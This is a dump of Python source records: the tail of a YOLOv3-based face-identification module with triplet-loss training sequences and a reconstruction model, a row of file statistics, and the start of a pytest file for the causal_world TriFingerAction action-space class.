box.xmax = np.min([np.max([box.xmax - pad_l, 0]) * h / self.nn_arch['image_size'], w])
box.ymin = np.min([box.ymin * h / self.nn_arch['image_size'], h])
box.ymax = np.min([box.ymax * h / self.nn_arch['image_size'], h])
count = 1
for box in boxes:
if count > 60:
break
# Search for id from registered facial ids.
# Crop a face region.
l, t, r, b = int(box.xmin), int(box.ymin), int(box.xmax), int(box.ymax)
image = image_o[(t - 1):(b - 1), (l - 1):(r - 1), :]
image = image/255
# Letterbox: scale the cropped face to the network input size, preserving the width/height ratio, and pad the remainder.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
# Check exception.
if w == 0 or h == 0:
continue
if w >= h:
w_p = self.nn_arch['image_size']
h_p = int(h / w * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = self.nn_arch['image_size']
w_p = int(w / h * self.nn_arch['image_size'])
pad = self.nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_CUBIC)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Create anchor facial ids.
anchor_facial_id = self.fid_extractor.predict(image[np.newaxis, ...])
anchor_facial_id = np.squeeze(anchor_facial_id)
anchor_facial_ids = np.asarray([anchor_facial_id for _ in range(len(subject_ids))])
# Calculate the similarity distance to each registered facial id.
sim_dists = []
for i in range(len(subject_ids)):
sim_dists.append(norm(anchor_facial_ids[i] - reg_facial_ids[i]))
sim_dists = np.asarray(sim_dists)
cand = np.argmin(sim_dists)
if sim_dists[cand] > self.hps['sim_th']:
continue
subject_id = subject_ids[cand]
if platform.system() == 'Windows':
f.write(file_name.split('\\')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
else:
f.write(file_name.split('/')[-1] + ',' + str(subject_id) + ',' + str(box.xmin) + ',' + str(box.ymin) + ',')
f.write(str(box.xmax - box.xmin) + ',' + str(box.ymax - box.ymin) + ',' + str(box.get_score()) + '\n')
count +=1
# Check exception.
if len(boxes) == 0:
continue
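# --- Illustrative sketch, not part of the original class ---
# In both evaluate() and test() a detected face is identified by the L2 distance
# between its embedding and every registered reference id; the closest reference
# wins unless the distance exceeds the sim_th threshold. Vectorised:
import numpy as np

def identify_sketch(anchor, reference_ids, subject_ids, sim_th):
    """Return the best-matching subject id, or None if nothing is close enough."""
    dists = np.linalg.norm(np.asarray(reference_ids) - anchor, axis=1)
    best = int(np.argmin(dists))
    return subject_ids[best] if dists[best] <= sim_th else None

# identify_sketch(np.array([0.1, 0.2]), [[0.1, 0.25], [0.9, 0.9]], [3, 8], 0.2) -> 3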
def create_face_reconst_model(self):
"""Create the face reconstruction model."""
if not hasattr(self, 'model') or not isinstance(self.model, Model):
raise ValueError('A valid model instance does not exist.')
if self.conf['face_vijana_recon_load']:
self.recon_model = load_model('face_vijnana_recon.h5')
return
# Get all layers and extract input layers and output layers.
layers = self.model.layers
input_layers = [layer for layer in layers if isinstance(layer, InputLayer) == True]
output_layer_names = [t.name.split('/')[0] for t in self.model.outputs]
output_layers = [layer for layer in layers if layer.name in output_layer_names]
# Input.
input1 = Input(shape=(int(output_layers[0].output_shape[1]/3), ), name='input1')
x = Lambda(lambda x: K.l2_normalize(x, axis=-1), name='l2_norm_layer')(input1) #?
x = ReLU()(x)
dense_layer = Dense(self.model.get_layer('dense1').input_shape[1]
, activation='linear'
, name='dense1')
x = dense_layer(x)
dense_layer.set_weights((self.model.get_layer('dense1').get_weights()[0].T
, np.random.rand(self.model.get_layer('dense1').get_weights()[0].shape[0])))
# Yolov3.
yolov3 = self.model.get_layer('base')
x = Reshape(yolov3.output_shape[1:])(x)
skip = x #?
# 73 ~ 63.
for i in range(73, 63, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 62.
conv_layer = yolov3.get_layer('conv_' + str(62))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(62))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 60 ~ 38.
for i in range(60, 38, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #??
# 37.
conv_layer = yolov3.get_layer('conv_' + str(37))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(37))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 35 ~ 13.
for i in range(35, 13, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 12.
conv_layer = yolov3.get_layer('conv_' + str(12))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(12))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 10 ~ 6.
for i in range(10, 6, -3):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 5.
conv_layer = yolov3.get_layer('conv_' + str(5))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(5))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
skip = x
# 4 ~ 2.
for i in range(3, 1, -2):
conv_layer = yolov3.get_layer('conv_' + str(i))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(i - 1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same' #?
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(i - 1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
x = subtract([x, skip]) #?
skip = x #?
# 1 ~ 0.
conv_layer = yolov3.get_layer('conv_' + str(1))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, strides=conv_layer.strides
, padding='same'
, use_bias=False
, name=conv_layer.name) #?
norm_layer = yolov3.get_layer('bnorm_' + str(1))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
x = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
conv_layer = yolov3.get_layer('conv_' + str(0))
deconv_layer = Conv2DTranspose(filters=conv_layer.input_shape[-1]
, kernel_size=conv_layer.kernel_size
, padding='same'
, use_bias=False
, name='output') #?
norm_layer = yolov3.get_layer('bnorm_' + str(0))
inv_norm_layer = BatchNormalization.from_config(norm_layer.get_config())
x = LeakyReLU(alpha=0.1)(x)
x = Lambda(lambda x: K.l2_normalize(x, axis=-1))(x)
x = inv_norm_layer(x)
output = deconv_layer(x)
deconv_layer.set_weights(conv_layer.get_weights())
self.recon_model = Model(inputs=[input1], outputs=[output])
self.recon_model.trainable = True
self.recon_model.save('face_vijnana_recon.h5')
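# --- Illustrative sketch, not part of the original class ---
# create_face_reconst_model() mirrors every encoder convolution with a
# Conv2DTranspose that reuses the convolution kernel. The core of that trick,
# assuming a Keras conv layer built with use_bias=False and an input tensor x
# whose channel count equals the convolution's output channels:
from tensorflow.keras.layers import Conv2DTranspose

def mirror_conv_sketch(conv_layer, x):
    """Apply a transposed convolution that reuses conv_layer's kernel."""
    deconv = Conv2DTranspose(filters=conv_layer.input_shape[-1],
                             kernel_size=conv_layer.kernel_size,
                             strides=conv_layer.strides,
                             padding='same',
                             use_bias=False)
    y = deconv(x)                                       # build the layer first
    deconv.set_weights([conv_layer.get_weights()[0]])   # then copy the kernel over
    return y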
class TrainingSequence(Sequence):
"""Training data set sequence."""
def __init__(self, raw_data_path, hps, nn_arch, load_flag=True):
if load_flag:
with open('img_triplet_pairs.pickle', 'rb') as f:
self.img_triplet_pairs = pickle.load(f)
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.nn_arch = nn_arch
self.db = pd.read_csv('subject_image_db.csv')
self.db = self.db.iloc[:, 1:]
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
else:
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.db = pd.read_csv('subject_image_db.csv')
self.db = self.db.iloc[:, 1:]
self.t_indexes = np.asarray(self.db.index)
self.db_g = self.db.groupby('subject_id')
self.img_triplet_pairs = []
valid_indexes = self.t_indexes
for i in self.db_g.groups.keys():
df = self.db_g.get_group(i)
ex_indexes2 = np.asarray(df.index)
ex_inv_idxes = []
for v in valid_indexes:
if (ex_indexes2 == v).any():
ex_inv_idxes.append(False)
else:
ex_inv_idxes.append(True)
ex_inv_idxes = np.asarray(ex_inv_idxes)
valid_indexes2 = valid_indexes[ex_inv_idxes]
# Triplet sample pair.
for k in range(0, ex_indexes2.shape[0] - 1):
for l in range(k + 1, ex_indexes2.shape[0]):
self.img_triplet_pairs.append((ex_indexes2[k]
, ex_indexes2[l]
, np.random.choice(valid_indexes2, size=1)[0]))
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
# Shuffle image pairs.
shuffle(self.img_triplet_pairs)
with open('img_triplet_pairs.pickle', 'wb') as f:
pickle.dump(self.img_triplet_pairs, f)
def __len__(self):
return self.hps['step']
def __getitem__(self, index):
images_a = []
images_p = []
images_n = []
# Check the last index.
if index == (self.hps['step'] - 1):
for bi in range(index * self.batch_size, len(self.img_triplet_pairs)):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
else:
for bi in range(index * self.batch_size, (index + 1) * self.batch_size):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
return ({'input_a': np.asarray(images_a)
, 'input_p': np.asarray(images_p)
, 'input_n': np.asarray(images_n)}
, {'output': np.zeros(shape=(len(images_a), 192))})
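# --- Illustrative sketch, not part of the original module ---
# __getitem__ above yields anchor/positive/negative batches together with an
# all-zero 192-wide dummy target, a common pattern when the loss depends only on
# the model's concatenated embeddings. Assuming 64-d embeddings concatenated as
# [anchor | positive | negative], a standard triplet margin loss would be:
import tensorflow as tf

def triplet_loss_sketch(_y_true, y_pred, margin=0.5, dim=64):
    """Triplet margin loss over concatenated (anchor, positive, negative) embeddings."""
    a, p, n = y_pred[:, :dim], y_pred[:, dim:2 * dim], y_pred[:, 2 * dim:]
    pos = tf.reduce_sum(tf.square(a - p), axis=-1)
    neg = tf.reduce_sum(tf.square(a - n), axis=-1)
    return tf.reduce_mean(tf.maximum(pos - neg + margin, 0.0))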
class TrainingSequenceVGGFace2(Sequence):
"""Training data set sequence."""
def __init__(self, raw_data_path, hps, nn_arch, load_flag=True):
if load_flag:
with open('img_triplet_pairs_vggface2.pickle', 'rb') as f:
self.img_triplet_pairs = pickle.load(f)
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.nn_arch = nn_arch
self.db = pd.read_csv('subject_image_vggface2_db.csv')
self.db = self.db.iloc[:, 1:]
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
else:
# Create indexing data of positive and negative cases.
self.raw_data_path = raw_data_path
self.hps = hps
self.db = pd.read_csv('subject_image_vggface2_db.csv')
self.db = self.db.iloc[:, 1:]
self.t_indexes = np.asarray(self.db.index)
self.db_g = self.db.groupby('subject_id')
self.img_triplet_pairs = []
valid_indexes = self.t_indexes
for i in self.db_g.groups.keys():
df = self.db_g.get_group(i)
ex_indexes2 = np.asarray(df.index)
ex_inv_idxes = []
for v in valid_indexes:
if (ex_indexes2 == v).any():
ex_inv_idxes.append(False)
else:
ex_inv_idxes.append(True)
ex_inv_idxes = np.asarray(ex_inv_idxes)
valid_indexes2 = valid_indexes[ex_inv_idxes]
# Triplet sample pair.
for k in range(0, ex_indexes2.shape[0] - 1):
for l in range(k + 1, ex_indexes2.shape[0]):
self.img_triplet_pairs.append((ex_indexes2[k]
, ex_indexes2[l]
, np.random.choice(valid_indexes2, size=1)[0]))
self.batch_size = self.hps['batch_size']
self.hps['step'] = len(self.img_triplet_pairs) // self.batch_size
if len(self.img_triplet_pairs) % self.batch_size != 0:
self.hps['step'] +=1
# Shuffle image pairs.
shuffle(self.img_triplet_pairs)
with open('img_triplet_pairs_vggface2.pickle', 'wb') as f:
pickle.dump(self.img_triplet_pairs, f)
def __len__(self):
return self.hps['step']
def __getitem__(self, index):
images_a = []
images_p = []
images_n = []
# Check the last index.
if index == (self.hps['step'] - 1):
for bi in range(index * self.batch_size, len(self.img_triplet_pairs)):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
else:
for bi in range(index * self.batch_size, (index + 1) * self.batch_size):
# Get the anchor and comparison images.
image_a = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][0], 'face_file']))
image_p = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][1], 'face_file']))
image_n = imread(os.path.join(self.raw_data_path
, 'subject_faces_vggface2'
, self.db.loc[self.img_triplet_pairs[bi][2], 'face_file']))
images_a.append(image_a/255)
images_p.append(image_p/255)
images_n.append(image_n/255)
return ({'input_a': np.asarray(images_a)
, 'input_p': np.asarray(images_p)
, 'input_n': np.asarray(images_n)}
, {'output': np.zeros(shape=(len(images_a), 192))})
def main():
"""Main."""
# Load configuration.
if platform.system() == 'Windows':
with open("face_vijnana_yolov3_win.json", 'r') as f:
conf = json.load(f)
else:
with open("face_vijnana_yolov3.json", 'r') as f:
conf = json.load(f)
if conf['fi_conf']['mode'] == 'data':
# Create db.
ts = time.time()
create_db_fi(conf)
te = time.time()
print('Elapsed time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'train':
# Train.
fi = FaceIdentifier(conf)
ts = time.time()
fi.train()
fi.make_facial_ids_db()
fi.register_facial_ids()
te = time.time()
print('Elapsed time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'evaluate':
# Test.
fi = FaceIdentifier(conf)
ts = time.time()
#fi.register_facial_ids()
fi.evaluate()
te = time.time()
print('Elapsed time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'test':
# Test.
fi = FaceIdentifier(conf)
ts = time.time()
#fi.register_facial_ids()
fi.test()
te = time.time()
print('Elapsed time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'fid_db':
fi = FaceIdentifier(conf)
ts = time.time()
fi.make_facial_ids_db()
#fi.register_facial_ids()
te = time.time()
print('Elapsed time: {0:f}s'.format(te-ts))
if __name__ == '__main__':
main()
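# --- Illustrative sketch (assumed configuration layout) ---
# main() only inspects conf['fi_conf']['mode'], which selects one of 'data',
# 'train', 'evaluate', 'test' or 'fid_db'; the other keys used elsewhere in this
# module (test_path, output_file_path, resource_type, ...) are not spelled out
# here, so the snippet below is a placeholder rather than a complete config:
#
# {
#     "fi_conf": {
#         "mode": "train"
#     }
# }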
| 43.809685
| 146
| 0.459322
| 8,778
| 77,806
| 3.845523
| 0.060606
| 0.034661
| 0.026543
| 0.036023
| 0.82806
| 0.814403
| 0.803294
| 0.791356
| 0.773907
| 0.765523
| 0
| 0.024731
| 0.432486
| 77,806
| 1,776
| 147
| 43.809685
| 0.739741
| 0.071601
| 0
| 0.795638
| 0
| 0.002423
| 0.054929
| 0.011635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015347
| false
| 0.000808
| 0.028271
| 0.001616
| 0.054927
| 0.011309
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f13668deb7c541b069d74ab98cddb65ca472bf6
| 14,085
|
py
|
Python
|
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | 2
|
2021-09-22T08:20:12.000Z
|
2021-11-16T14:20:45.000Z
|
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
from causal_world.envs.robot.action import TriFingerAction
import math
import numpy as np
import pytest
@pytest.fixture(scope='module')
def as_jp_norm():
return TriFingerAction(action_mode="joint_positions",
normalize_actions=True)
@pytest.fixture(scope='module')
def as_jp_full():
return TriFingerAction(action_mode="joint_positions",
normalize_actions=False)
@pytest.fixture(scope='module')
def as_jt_norm():
return TriFingerAction(action_mode="joint_torques", normalize_actions=True)
@pytest.fixture(scope='module')
def as_jt_full():
return TriFingerAction(action_mode="joint_torques", normalize_actions=False)
@pytest.fixture(scope='module')
def as_default():
return TriFingerAction()
@pytest.fixture(scope='module')
def as_custom():
return TriFingerAction(normalize_actions=False)
upper_99_normalized_action = np.array([0.99] * 9)
upper_100_normalized_action = np.array([1.0] * 9)
upper_101_normalized_action = np.array([1.01] * 9)
lower_99_normalized_action = np.array([-0.99] * 9)
lower_100_normalized_action = np.array([-1.0] * 9)
lower_101_normalized_action = np.array([-1.01] * 9)
upper_100_denormalized_jt_action = np.array([0.36] * 9)
lower_100_denormalized_jt_action = np.array([-0.36] * 9)
lower_100_denormalized_jp_action = np.array(
[-1.57, -1.2, -3.0] * 3)
upper_100_denormalized_jp_action = np.array(
[1.0, 1.57, 3.0] * 3)
normalized_action_to_be_clipped = np.array(
[-1.01, 2.0, 0.5, 0.4, 1.3, -6.0, 0.0, 0.3, 1.1])
normalized_action_clipped = np.array(
[-1.0, 1.0, 0.5, 0.4, 1.0, -1.0, 0.0, 0.3, 1.0])
custom_action_upper_bound = np.array([1, 2, 3, 4])
custom_action_lower_bound = np.array([0, 1, -3, -10])
custom_action_norm_upper_bound = np.array([1, 1, 1, 1])
custom_action_norm_lower_bound = np.array([-1, -1, -1, -1])
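# --- Illustrative sketch (hypothetical helpers, not part of causal_world) ---
# The tests below exercise normalize_action/denormalize_action, which map actions
# between a physical range [low, high] and the normalized range [-1, 1]. The
# expected values above are consistent with a plain linear rescale:
import numpy as np

def normalize_sketch(action, low, high):
    return 2.0 * (action - low) / (high - low) - 1.0

def denormalize_sketch(action, low, high):
    return low + (action + 1.0) / 2.0 * (high - low)

# Round trip on the joint-position bounds used in the tests:
# lo = np.array([-1.57, -1.2, -3.0] * 3); hi = np.array([1.0, 1.57, 3.0] * 3)
# np.allclose(denormalize_sketch(normalize_sketch(hi, lo, hi), lo, hi), hi) -> True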
def test_set_action_space(as_custom):
as_custom.set_action_space(custom_action_lower_bound,
custom_action_upper_bound)
assert (as_custom.get_action_space().low == custom_action_lower_bound).all()
assert (
as_custom.get_action_space().high == custom_action_upper_bound).all()
assert (as_custom.normalize_action(custom_action_upper_bound) ==
custom_action_norm_upper_bound).all()
assert (as_custom.normalize_action(custom_action_lower_bound) ==
custom_action_norm_lower_bound).all()
def test_get_action_space(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.get_action_space().low == -1.).all()
assert (as_jp_norm.get_action_space().low == -1.).all()
assert (as_jt_norm.get_action_space().low == -1.).all()
assert (as_default.get_action_space().high == 1.).all()
assert (as_jp_norm.get_action_space().high == 1.).all()
assert (as_jt_norm.get_action_space().high == 1.).all()
assert (as_jp_full.get_action_space().low ==
lower_100_denormalized_jp_action).all()
assert (as_jt_full.get_action_space().low ==
lower_100_denormalized_jt_action).all()
assert (as_jp_full.get_action_space().high ==
upper_100_denormalized_jp_action).all()
assert (as_jt_full.get_action_space().high ==
upper_100_denormalized_jt_action).all()
def test_is_normalized(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.is_normalized()
assert as_jt_norm.is_normalized()
assert not as_jt_full.is_normalized()
assert as_jt_norm.is_normalized()
assert not as_jp_full.is_normalized()
def test_satisfy_constraints(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.satisfy_constraints(upper_99_normalized_action)
assert not as_default.satisfy_constraints(upper_100_normalized_action)
assert not as_default.satisfy_constraints(upper_101_normalized_action)
assert as_jt_norm.satisfy_constraints(upper_99_normalized_action)
assert not as_jt_norm.satisfy_constraints(upper_100_normalized_action)
assert not as_jt_norm.satisfy_constraints(upper_101_normalized_action)
assert as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_99_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_100_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_101_normalized_action))
assert as_jp_norm.satisfy_constraints(upper_99_normalized_action)
assert not as_jp_norm.satisfy_constraints(upper_100_normalized_action)
assert not as_jp_norm.satisfy_constraints(upper_101_normalized_action)
assert as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(upper_99_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(upper_100_normalized_action))
assert not as_jp_full.satisfy_constraints(
